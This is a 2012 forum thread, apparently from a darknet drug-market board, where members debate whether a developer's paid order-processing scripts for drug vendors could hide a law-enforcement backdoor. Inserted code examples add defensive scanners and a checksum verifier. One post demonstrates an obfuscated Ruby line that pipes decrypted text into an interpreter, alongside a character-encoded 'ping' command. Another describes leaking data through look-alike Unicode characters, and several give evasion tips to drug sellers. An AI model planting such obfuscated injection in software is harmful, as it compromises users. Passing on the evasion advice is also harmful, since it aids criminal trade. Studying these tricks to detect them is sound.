Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 06:07 am
grepping for ping isn't going to find

[112, 105, 110, 103, 32, 108, 46, 116, 118]

grepping for [112, 105, 110, 103, 32, 108, 46, 116, 118] isn't going to find

[100 + 12, 100 + 5, 100 + 10, 100 + 3, 30 + 2, 100 + 8, 40 + 6, 110 + 6, 110 + 8]
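
The encoding trick in the post above, seen from the auditor's side, as an added example that is not code from the thread: a small Ruby pre-review pass that folds constant arithmetic inside integer arrays, decodes them to ASCII, and lists every line that reaches a shell or interpreter. The sink list and the sample file are assumptions constructed from the lines quoted in the thread; the pass is a heuristic aid to a full read-through of the source and does not replace one.

```ruby
# Added audit example (not code from the thread). Heuristic only.

# Places where Ruby hands a string to a shell or an interpreter (assumed list).
SINKS = {
  "backtick command" => /`[^`]*`/,
  "%x command"       => /%x[\{\(\[]/,
  "system/exec call" => /\b(?:system|exec|spawn)\s*[\( "']/,
  "popen call"       => /\b(?:IO\.popen|Open3\.\w+)/,
  "eval call"        => /\b(?:eval|instance_eval|class_eval)\b/,
  "pack call"        => /\.pack\s*\(/
}.freeze

# An array literal holding only digits, whitespace, commas and + - * operators.
INT_ARRAY = /\[\s*(\d[\d\s+\-*]*(?:,\s*\d[\d\s+\-*]*)+)\]/

# Evaluate constant arithmetic such as "100 + 12" without calling eval.
# Returns an Integer, or nil if the text is not number/operator/number/...
def fold_constant(expr)
  tokens = expr.scan(/\d+|[+\-*]/)
  return nil unless tokens.size.odd?
  well_formed = tokens.each_slice(2).all? do |num, op|
    num =~ /\A\d+\z/ && (op.nil? || op =~ /\A[+\-*]\z/)
  end
  return nil unless well_formed

  terms = [tokens.first.to_i]
  signs = []
  tokens.drop(1).each_slice(2) do |op, num|
    if op == "*"
      terms[-1] *= num.to_i          # multiplication binds tighter
    else
      signs << op
      terms << num.to_i
    end
  end
  total = terms.first
  signs.each_with_index do |op, i|
    total = op == "+" ? total + terms[i + 1] : total - terms[i + 1]
  end
  total
end

# Return the ASCII text hidden in any integer array on this line.
# Arrays shorter than three elements or with non-printable values are ignored.
def decode_int_arrays(line)
  decoded = line.scan(INT_ARRAY).map do |(body)|
    values = body.split(",").map { |element| fold_constant(element) }
    next if values.any?(&:nil?) || values.size < 3
    next unless values.all? { |v| v.between?(32, 126) }
    values.pack("U*")
  end
  decoded.compact
end

# Scan Ruby source text and return a list of findings for manual review.
def audit(source)
  findings = []
  source.each_line.with_index(1) do |line, number|
    next if line.strip.start_with?("#") # skip full-line comments
    SINKS.each do |kind, pattern|
      findings << { line: number, kind: kind, detail: line.strip } if line =~ pattern
    end
    decode_int_arrays(line).each do |text|
      findings << { line: number, kind: "encoded string", detail: text }
    end
  end
  findings
end

# Constructed sample: lines taken from the posts in this thread plus one
# harmless array, so the scanner has both hits and a non-hit to show.
SAMPLE = <<~'RUBY'
  message = File.read("test")
  decrypted_message = `echo "#{message}" | gpg -d`
  puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
  cmd = [100 + 12, 100 + 5, 100 + 10, 100 + 3, 30 + 2, 100 + 8, 40 + 6, 110 + 6, 110 + 8]
  rows = [1, 2, 3]
RUBY

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE).each do |f|
    puts format("line %d  %-18s %s", f[:line], f[:kind], f[:detail])
  end
end
```

A plain text search of the sample for `irb` or `ping` finds nothing, while the decoded findings show both strings; any sink or decoded string still has to be read in context by someone who knows the language.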
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 07:31 am
There is nothing encrypted in my example either, the only encrypted data would be ciphertexts encrypted by anyone to the vendors key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.

Okay, that does make it clearer.  Documentation helps, documentation is a Good Thing.  ;)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 07:43 am
I didn't know it took that long, I guess it's a bit more useful than I thought due to that.

If decrypting an address and pasting it into a template for printing takes 2 or 3 minutes manually, then a larger vendor processing anywhere from a dozen to tens of orders is going to spend a lot of time on a mind-numbing and repetitive task.

So if all of those people think a program is unsafe unless certain steps are taken and that is the main concern people have here then what is your really simple summarized response to that?  Do you think that it could potentially represent a security risk to buy anonymous unaudited software from you or not?  Everyone here seems to think so and that's really the only major point that anyone has brought up but ironically it seems like that is the one point you haven't been clear enough on.

Well, Kmf is still trying to argue that because it may be possible to plant an exploit in code surreptitiously then obviously my business model/decisions are flawed.  He still hasn't managed to find a way to bridge an air gap other than to say that he doesn't think most people employ an air gap.

It doesn't matter how much of a potential exploit might be in software if it is physically prevented from accessing any other network.

I think you've only really answered by saying you'd somehow give them a completely in depth explanation of absolutely everything regarding the code but unless you made it many many pages and sourced absolutely with internet links etc then they'd just be blindly putting faith in the fact that you're not lying no?  It just doesn't seem possible and would probably be MUCH more work than everything else combined.  Did you give the vendors who have bought it so far any of that?

Only one vendor has it so far, the one who commissioned it.  That vendor received step-by-step descriptions of what was being written as it was being written.  So effectively, yes.

I guess you've also said that it would be easier to get to vendors in other ways but that doesn't really say anything whether it's true or not.

That was in response to Pine's initial assertion that because I am not giving it away for free I must be some kind of narc.  My counter argument was that if I was a narc I would've devised a better mode of attack.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 08:32 am
You are completely misunderstanding what I did. I didn't include encrypted code with the program, I included a line of code in the program that executes a decrypted ciphertext as another script if it has a special signal string in it. The only difference between a completely legitimate version of my simple script (that merely takes a file with a GPG ciphertext in it and prints the plaintext to the screen after the user has entered their password) and a malicious version that allows an attacker to craft a ciphertext that decrypts into additional code that is executed, is this line of code in the original program: | #{[105, 114, 98].pack("c*")

That really is quite fascinating.  One question:

Does the trigger string need to be part of the code or does it just tell the existing code to activate?  I'm assuming you mean the former, but I just want to clarify (since I don't know Ruby and don't know what your code snippet actually does).

And you can claim all you want here about how your code functions, but nobody will ever know unless they look at it and the full point we are trying to make is that the people who are going to buy it inherently are people who will not notice that | #{[105, 114, 98].pack("c*") is the difference between a safe program and a backdoored version.

Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too).  I've already said several times what modules are imported, so there goes that.

Hell, there are only two files with integers in them (to read data in each row of the CSVs).  Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it.  Obviously in the case of those three files the number is part of a string and not an integer.

Plus if a vendor is using an air gap all the networking code in the world won't do shit.  Yes, I know buyers are lazy and probably don't, but the paranoia of dealing makes an air gap a greater possibility.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 09:22 am
Quote
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).

I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???

Nope, she stopped replying to this thread a couple of days ago.

Quote
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.

You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*") sets the formatting of the text, I don't expect them to analyze every single line of what I write simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here, then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??

Hmmm, the flip side to that is that releasing code here isn't quite the same as doing it on the clearnet where there is a greater pool of coders willing to delve into these things.  Even if code is posted here on the forums there is no guarantee that any bugs or exploits will be caught by anyone.  All it guarantees is working for free.

Now, given that my project is aimed at increasing the efficiency of other people's business, I see nothing wrong with charging for it instead of giving it away.  That said, I'm well aware of the advantages of the open source model in code review.  I'm just not convinced that there are really enough people here with the skills to do it and as a result posting the code would just mean giving away my work for no real benefit.

By the way, did you actually see the proof-of-concept shell script I posted earlier in this thread?  It served as the basis for what became SROPPy.

Quote
Then why don't you?  Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.

Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.

How many people here do you expect actually know enough Ruby and/or C to properly audit it and who have the time to do so?

How many people would use it without checking on the assumption that it was posted publicly therefore it must be fine?  I'd say that would be more than a few.

Quote
Running an executable .py file uses the Python interpreter to run the code.  Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files).  Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.

Ruby is the same, written in C with many of the modules also in C. The primary difference seems to be that Python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in Ruby 2.0 :D.

By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that.  Wow.

Granted, Python has been around for a few years longer, but it's done the bytecode thing for ages.

I am not at all worried that the primary Python interpreters are going to be exploited any more than I am that Firefox is.

There was some concern earlier in the thread about reliance on HTMLDOC (which converts HTML to PDF), mainly from Pine and I think because she'd never heard of it before.

What I am worried about is the fact that someone buying a script like this is not going to recognize | #{[105, 114, 98].pack("c*") is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack as well as ways of encoding data as well as what the pipe symbol does on the terminal as well as what backticks do in Ruby. The actual program distributed would have no networking code, would make a single call to GPG using the user's own key, and could even be made more sneaky by removing the need for an if else statement.

I'll admit I haven't looked too heavily into trying to replicate your backdoor in Python, but from what I've read of the array and struct modules it would not be anywhere near that short.  Which would make it more difficult to conceal.

On another note, what would your code do if something triggered the exploit, but an air gap was in place?  Would it just keep going and behave as normal or would it die horribly (possibly with an error indicating it could not find a network)?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:37 am
Also, I know this is going to come out of left field but could you please stop with the platypus shit at least for this one thread.

Ah! Et tu Brutus? You have wounded me.

Think what you will, but you can always use his software on a machine that's not connected to the net.

Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.

Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.

Given all the software does, you can do that.

Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.

I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:39 am
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
Easily proven wrong with SHA256 checksums.  Actually, there's a point, better go and add that for the individual files.

Yes you should. But you didn't do this in the first place, if we believe that you are telling us the truth, then this thought has come to you in hindsight. That's the central troubling factor, that you have talked a great deal about security in the past and yet you made what many of us consider an elementary mistake. When the issue of whether obtaining programs from anonymous people on drug forums is considered sketchy is brought up, your answer is that the vendors can audit the code, which as kmfkewm pointed out later in this thread, is fundamentally illogical because if they can audit the code then they can also write it themselves.

*Pine talking about a way to deliver an exploit.
That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.

The question rears its head again of why somebody who clearly knows about the dangers of exploits, would seemingly come up with a plan that bears a startlingly close resemblance to one. It is clear that you must either have malicious intentions, or a rather severe lack of introspection.

C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.

The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.

Red flags everywhere! I think it's already been pointed out, but you're strongly implying that they should trust your judgement. Which given our discussions on relying exclusively on cryptographic trust...

The focus of our concern is that you could be an able enough wordsmith for vendors to think: "yeah, that all sounds pretty legit, no need to get overly paranoid and get other people to test it, I'll just make a quick sweep of the forums and if everybody's happy it should be all good..." (the bandwagon fallacy, it's common to all investors in bubbles as well).

Of course you could (or not, we only have your word for it and your advert contains no caveats of this nature) advise they have somebody else audit the code to check Louis is not bullshitting them, but the real life situation is that

A: Vendors are busy people.

B: Most vendors don't know code (and as evident from this thread, some people think that open source automatically implies a near certain lack of backdoor exploits, which is hilarious were this not so serious when you consider that it is only open source to people who can't read the damn code in the first place, I mean talk about being a one eyed man in the valley of the blind!), and C: this has gone unsaid so far, but it's important, that *they have already paid up for the software and they need to use it right away or they wouldn't have purchased it*.

This is practically the archetype of a situation in which somebody would sacrifice security for convenience.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:40 am
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programmers could be caught out if they are not trained to analyze potentially malicious code. Code analysis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

Don't expect an exploit to be straightforward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.

Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

This is junk. Just like your answer with the Air Gap.

Putting exploits into a JPEG file, or any binary for that matter, is many orders of magnitude more difficult than, just for example... merely giving somebody a program which contains an exploit directly.

This answer you gave, only makes sense to somebody who doesn't know security. That is what has concerned me over and over again, that all your answers sound good on paper to somebody who is less than knowledgeable about computer security e.g. most vendors.


--

Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.

It would still require access to a network.

Eventually yes, but it doesn't have to be on a live network or happen immediately. If an exploit was used in the way I described, it would bypass even an Air Gap to decrypt messages and SHA-1 checksum validation on data intended to be outgoing on the networked machine. It isn't really a technological attack, but a psychological one that depends on the vendor not noticing that some characters in his plaintext message have been substituted for other extremely similar characters in order to encode information.

An example:

U+0374 is the Unicode for this: ʹ (actually the Greek numeral sign) and it looks similar to
U+0341 which is the Unicode:  ́  (actually a diacritical mark)

Certainly not something you'd notice while composing dozens of messages to people. If you did notice then you'd just assume it was something to do with font rendering or something. But the difference is that the person receiving your messages could be a LE agent who is searching for precisely these encoded differences in order to extract information about the target.

This is not necessarily even the IP address although that is the most straightforward. It could be the handle given to the operating system (which Microsoft will have a record of somewhere), it could really be almost anything, I'm sure others can come up with better ideas of what information to encode.

But there are better examples of using Unicode hacking and encoding information to have it passed back by an unwitting target in an encrypted message. In particular if you replace dozens of single 'spaces' with a tab or so for example, making the encoding literally invisible. And of course, all this is happening to plaintext, so any hashing done becomes irrelevant, the computer thinks that is what you intended to send, it doesn't know that you didn't choose those particular characters and they were substitutions from some "helper program".

The "TLDR;" is this. If you think an exploit must rely on a network ping or that an exploit will be visible if you're looking straight at it, then you're wrong. Exploits are nearly always based on a combination of 10% technology and 90% understanding human psychology, ever since the first viruses were invented.

This is not science fiction stuff, it's not especially difficult to do things like this. It is simple to avoid the entire issue by not using unaudited software from anonymous sources, such as your initial proposition Louis.

*pine explains the idea of the character encoding exploit

I think you're misunderstanding what it does with encrypted data.  It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.

You're implying we should take your word for it, that the program does what you say it does. You can "explain" what your program does all day long, but you could be lying. This really is kindergarten stuff.

"It does X" - person 1
"You could be lying for all I know" - person 2
"Let me explain how it all works" - person 1
"..." - person 2
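
The substitution channel pine describes above (look-alike code points such as U+0374 and U+0341, or tabs swapped in for spaces) leaves any hash of the outgoing text valid, so the check has to look at the characters themselves. The following is an added example, not code from the thread or from any program discussed in it: a Python check, run on the plaintext before it is encrypted, that reports every character a plain-ASCII message should not contain. The function names and both sample messages are constructed for illustration.

```python
import unicodedata
from typing import List, NamedTuple


class Finding(NamedTuple):
    line: int       # 1-based line number
    col: int        # 1-based column
    codepoint: str  # e.g. "U+0374", or "-" for a whole-line finding
    kind: str       # short machine-readable reason
    detail: str     # Unicode name or explanation


def _classify(ch: str, prev: str) -> str:
    """Return a finding kind for one character, or "" if it is unremarkable."""
    cp = ord(ch)
    if ch == "\t":
        return "tab"                      # tab standing in for a space
    if ch == " ":
        return "space-run" if prev == " " else ""
    if cp < 0x20 or cp == 0x7F:
        return "control"
    if cp < 0x7F:
        return ""                         # ordinary printable ASCII
    cat = unicodedata.category(ch)
    if cat.startswith("M"):
        return "combining-mark"           # e.g. U+0341
    if cat == "Cf":
        return "invisible-format"         # e.g. zero width space
    if cat == "Zs":
        return "non-ascii-space"
    return "non-ascii"                    # e.g. U+0374 in place of an apostrophe


def audit_plaintext(text: str) -> List[Finding]:
    """List every character that could carry hidden data in an ASCII message."""
    findings = []
    lines = text.replace("\r\n", "\n").split("\n")
    for ln, line in enumerate(lines, 1):
        prev = ""
        for col, ch in enumerate(line, 1):
            kind = _classify(ch, prev)
            if kind:
                findings.append(Finding(ln, col, f"U+{ord(ch):04X}", kind,
                                        unicodedata.name(ch, "<unnamed>")))
            prev = ch
        stripped = line.rstrip(" \t")
        if stripped != line:
            extra = len(line) - len(stripped)
            findings.append(Finding(ln, len(stripped) + 1, "-",
                                    "trailing-whitespace",
                                    f"{extra} trailing character(s)"))
    return findings


# Constructed sample messages (not taken from the thread).
CLEAN = "Order received. It's shipping Monday.\nThanks for your patience.\n"
TAMPERED = ("Order received. It\u0374s shipping\tMonday.\n"
            "Thanks for\u200b your  patience. \n")


if __name__ == "__main__":
    for label, message in (("clean", CLEAN), ("tampered", TAMPERED)):
        results = audit_plaintext(message)
        print(f"{label}: {len(results)} finding(s)")
        for f in results:
            print(f"  line {f.line} col {f.col} {f.codepoint} {f.kind}: {f.detail}")
```

A message legitimately written in a non-Latin script will be flagged throughout; the check assumes ASCII-only correspondence.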
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:42 am

To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.

Then don't buy it.  I'm not forcing anyone to, it's their choice.

This is about security, not some kind of "quality control" issue. As many people can buy your software as they like, but they should be informed of how hazardous that proposition could be, hence this thread.

There are far better vectors for attack on this site than a handful of scripts that can be read before they're run or run on a disconnected system.

Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example.  Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.

This is nowhere near as simple as you're claiming. Image based exploits exist. But if it was as trivial as you're implying, it would have already been done a long time ago indeed.

Yes, there is, but I'm not forcing anyone to buy or use this.  I am providing a product which some vendors may elect to purchase and use and others may choose not to.  It's a free market.

This is.. beside the point. Forcing people to do things isn't even a possibility on here. This is a strawman argument, you're pretending my arguments are something other than what they are.

I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.

One of which requires network access, which is not required by the program.  One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command).  The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).

Once more, you are not even implying it here, you are saying it outright, that we should trust you. This is your original sin.

I seem to remember that your advertisement had *no* caveats about getting somebody else to verify the code against your claims. I seem to remember your advertisement had *no* caveats about using a checksum to make sure you didn't do a bait 'n switch with your program.

*Everything* you said about that only came after this thread. So we have no evidence you had any plans at all to perform any double checking of any kind whatsoever. Whether they would actually work isn't even the question, it's that you apparently thought vendors would merrily download your software without checking it was without exploitation. The vendor that acquired the code from you, if this vendor is actually indeed real and not just a sock puppet, if they did not carefully audit the code, then the vendor is either naive or an idiot.

This is the entire point of this thread. Depending on trust in a single anonymous person's judgement is a recipe for a complete catastrophe for your operational security i.e. Do not pass Go, go to Jail.

And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.

For fuck's sake!  I can think of sneakier and nasty ways to target this site, if I was really trying to do it then I sure as shit wouldn't have tried this.  See my JPG example above (and do a Google search on "jpg exploit").

I can't be 100% certain, but reading material on image exploitation, you quickly come to the understanding that doing one would likely have to involve the use of a zero day exploit. Even if it were not at that level of difficulty, it's definitely somewhere in that ballpark. How do I know? Because I'm typing this right now and am not in police custody. If it were easy to do, LE would have already done it to everybody on SR.

The LE accusation only holds true if the code can somehow report on users, which it doesn't. 

We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.

And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive.  I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.

Yes, you're correct.

My attitude is paranoid because you have to be to survive here. I am accusing you of very suspect LE-like behaviour and it's completely irrelevant to the discussion whether me accusing you of being a LE agent hurts your feelings.

If the drug war ends, and it turns out that you were not a LE agent after all, but a python programmer with a lack of introspection who intended to do the right thing, then I will personally give you five hundred US dollars to recompense you for lost custom and aggravation, along of course with a sincere apology. Unfortunately this is unlikely for reasons beyond our control. Today's situation is that you look extremely guilty to me.

Of course it wouldn't make a jot of difference if you posted code to the forums. We *have no* way to know it was the code or a version with the exploit edited out of it.

Not rocket science!

The thread is not about pine trying to get free software out of some open source fanatical resolve, it is about the very great difficulty of trusting somebody who has acted in a very suspicious way.

It can quite easily run on a completely disconnected system.  It makes no difference to the program.

Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.

Then they should employ one.  Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install.  Data transferred to it via read-only media and no data EVER transferred off it and it's done.  How much would it cost using hardware from 6 or 7 years ago?  Fifty bucks?  A hundred?

If as a result of this thread every vendor went and got an Air Gap, I would be flabbergasted. Delighted, but in some kind of shock.

Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.

While it is obviously the case a vendor could make 'batch replies' or 'batch reads' if not replying, you are trivializing what is a serious amount of work and more importantly the delay in responding to customers. You're also missing the fact that a great many vendors are transient vendors, not permanent fixtures to the marketplace, in fact the majority of them are probably temp vendors rather than in it for the long haul.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:44 am
Pine, this is the second time you've accused me of being LE based on a misunderstanding of software.  The first time was not understanding how GPG verifies signatures.  You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.

I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.

Actually you did:

Quote from: pine
bash-3.2$ ls -l pine-leo1.eml.asc
-rw-r--r--  1 user  staff  1951 Sep  6 07:37 pine-leo1.eml.asc
bash-3.2$ gpg -v pine-leo1.eml.asc
gpg: armor header: Version: GnuPG v2.0.17 (MingW32)
gpg: public key is 0x00ACF6D2D677EF45
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576

You need a passphrase to unlock the secret key for
user: "Louis Cyphre <lcyphre@tormail.org>"
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
         (subkey on main key ID 0x7E8BE6B1DD7B4576)

gpg: encrypted with 4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
      "Louis Cyphre <lcyphre@tormail.org>"
gpg: AES256 encrypted data
gpg: original file name=''
bash-3.2$ cat pine-leo1.eml
Hi LC!

Your signed PGP message is invalid! :O

I've tested it with other people's PGP sigs, and the software is working ok.

KeyID: DD7B4576
Status: Key NOT valid
User Name: Louis Cyphre <lcyphre@tormail.org>

So, either signed it wrong or you're LE attempting a threesome :D

Cheers!

Pine
bash-3.2$

So, I re-iterate, this is your second false accusation against me.  Unless you're going to deny that you sent me that and to which I responded by explaining how key validity and the web of trust works.

Do you want to also post the rest of our communication surrounding that exchange? Because you missed the bit where I explain I have to go double check this thing. You'd think the smiley face emoticon would indicate an element of humor regarding my so called "accusation".

I do find it interesting you're storing decrypted messages though.

In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphre Software Apologists are going to make that go away.

Yet there are ways for anyone who buys it to do so.  Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.

What? So it costs 150 dollars and an LE agent becoming a member of the community per exploitation delivery? I think a LEA would be quite happy with that kind of return on investment to be honest. Don't talk as if you've a lot to lose if my suspicions are correct. You don't.

And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.

Which proves the point I made above, you've made up your mind and there's nothing I can do to change that.  As I said, even if I were to post all the code now you'd still think I was up to something.

What I have made my mind up about, is that your actions are incredibly suspect and lead me to believe you could be a LE agent. Of course this cannot ever be proven on an anonymous forum. And as I said before, that posting the code is irrelevant is merely a statement of the obvious.

Your statements here are a logical fallacy, what in debating is called "Tu Quoque". In English, you think that by answering a criticism with a criticism, that you are engaging me, when in fact you're avoiding the main point which is that we can't trust people who have sketchy behavior.

If your response was along the lines of "I am not a LE agent, but I can see that this looks a bit suspect to you because if I were hypothetically LE I could be trying to deliver an exploit, in future I will do X {checksum/ do proper independent audits, make it publicly available} so that the software could be validated against containing exploits" then I would be still mad that you didn't think of the necessity of software auditing on a forum of criminals, but nowhere near as mad as I am now, because your position is essentially this, when you take out the verbiage:

"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"


--

disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
These scripts will only be used in torbox images.

See, if every vendor had operational security up to this level of sophistication it'd be fine in practice, but it's not something you can assume for everybody.

Idea for verification->

Let 5 "trusted" members verify the source and publish the MD5 hash.

Do that with every version.

Donate to the members and cyphre. DONATE ENOUGH FOR THEM!

Give away scripts for free. Work together for the good of the community. Public development thread.

An MD5 hash isn't good enough nowadays, but the main point of this I agree with. If there were an entire "open open source" development of short useful scripts available on the forum with some arrangement where 'bitcoin bounties' existed for getting good stuff, then that would be great. I can't organize all this, but maybe somebody else could take up the torch. I would recommend that all scripts were JavaScript since it doesn't have networking/local HD access at all and is straightforward to audit as long as the scripts are small enough.

--

Not quite.  The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet.  I'm certainly not inclined to right now.

This is pretty much the only argument you've made I agree with thus far.
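
The verification idea quoted in the post above (several reviewers each publish a hash for every version) and the per-file SHA-256 checksums raised earlier in the thread can be combined into one check. The following is an added example, not code from the thread or from SROPPy: it hashes every file in a downloaded release and accepts it only when a quorum of independently published `sha256sum`-style manifests match it exactly. File names, reviewer names and the quorum value are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def format_manifest(manifest: Dict[str, str]) -> str:
    """Render a manifest in the '<digest>  <path>' form sha256sum prints."""
    return "".join(f"{d}  {n}\n" for n, d in sorted(manifest.items()))


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse sha256sum-style lines; reject anything that is not a full digest."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        digest, name = digest.lower(), name.strip().lstrip("*")
        if len(digest) != 64 or set(digest) - set("0123456789abcdef") or not name:
            raise ValueError(f"malformed manifest line: {raw!r}")
        entries[name] = digest
    return entries


def diff_manifest(local: Dict[str, str], published: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files whose hash differs, plus files only one side knows about."""
    return {
        "changed": sorted(n for n in local.keys() & published.keys()
                          if local[n] != published[n]),
        "unlisted": sorted(local.keys() - published.keys()),  # extra file shipped
        "missing": sorted(published.keys() - local.keys()),   # reviewed file absent
    }


def verify_quorum(root, reviewer_manifests: Dict[str, str],
                  quorum: int) -> Tuple[bool, List[str], Dict[str, dict]]:
    """Accept the release only if at least `quorum` manifests match exactly."""
    local = build_manifest(root)
    agreeing, disagreeing = [], {}
    for reviewer, text in sorted(reviewer_manifests.items()):
        delta = diff_manifest(local, parse_manifest(text))
        if any(delta.values()):
            disagreeing[reviewer] = delta
        else:
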